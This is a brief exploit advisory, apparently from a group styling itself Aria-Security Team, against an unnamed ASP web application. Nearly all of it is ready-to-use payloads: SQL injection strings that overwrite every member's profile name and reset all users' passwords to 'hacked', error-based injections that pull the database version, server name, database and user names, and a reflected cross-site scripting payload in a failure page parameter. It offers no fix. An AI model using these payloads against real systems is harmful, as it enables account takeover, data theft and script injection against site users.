Aria-Security Team http://Aria-Security.Net ----------------------------- Discovered By: Mormoroth Shout outs The-0utlaw for completing the vuln. I.SQL Injection'update Members set ProfileName='hacked';-- This Changes MemberList...'update Members set Password='hacked';-- changes all the users' password to hacked myaccount/psswd.asp has the same problem a' or 1=convert(int,@@version)-- a' or 1=convert(int,@@servername)-- a' or 1=convert(int,db_name())-- a' or 1=convert(int,user_name())-- a' or 1=convert(int,system_user) Might be useful. II.Cross Site SCripting: failure.asp?err_txt="><script>alert('Aria-Security.Net')</script> Adivsory @ Credits Goes To Aria-Security Team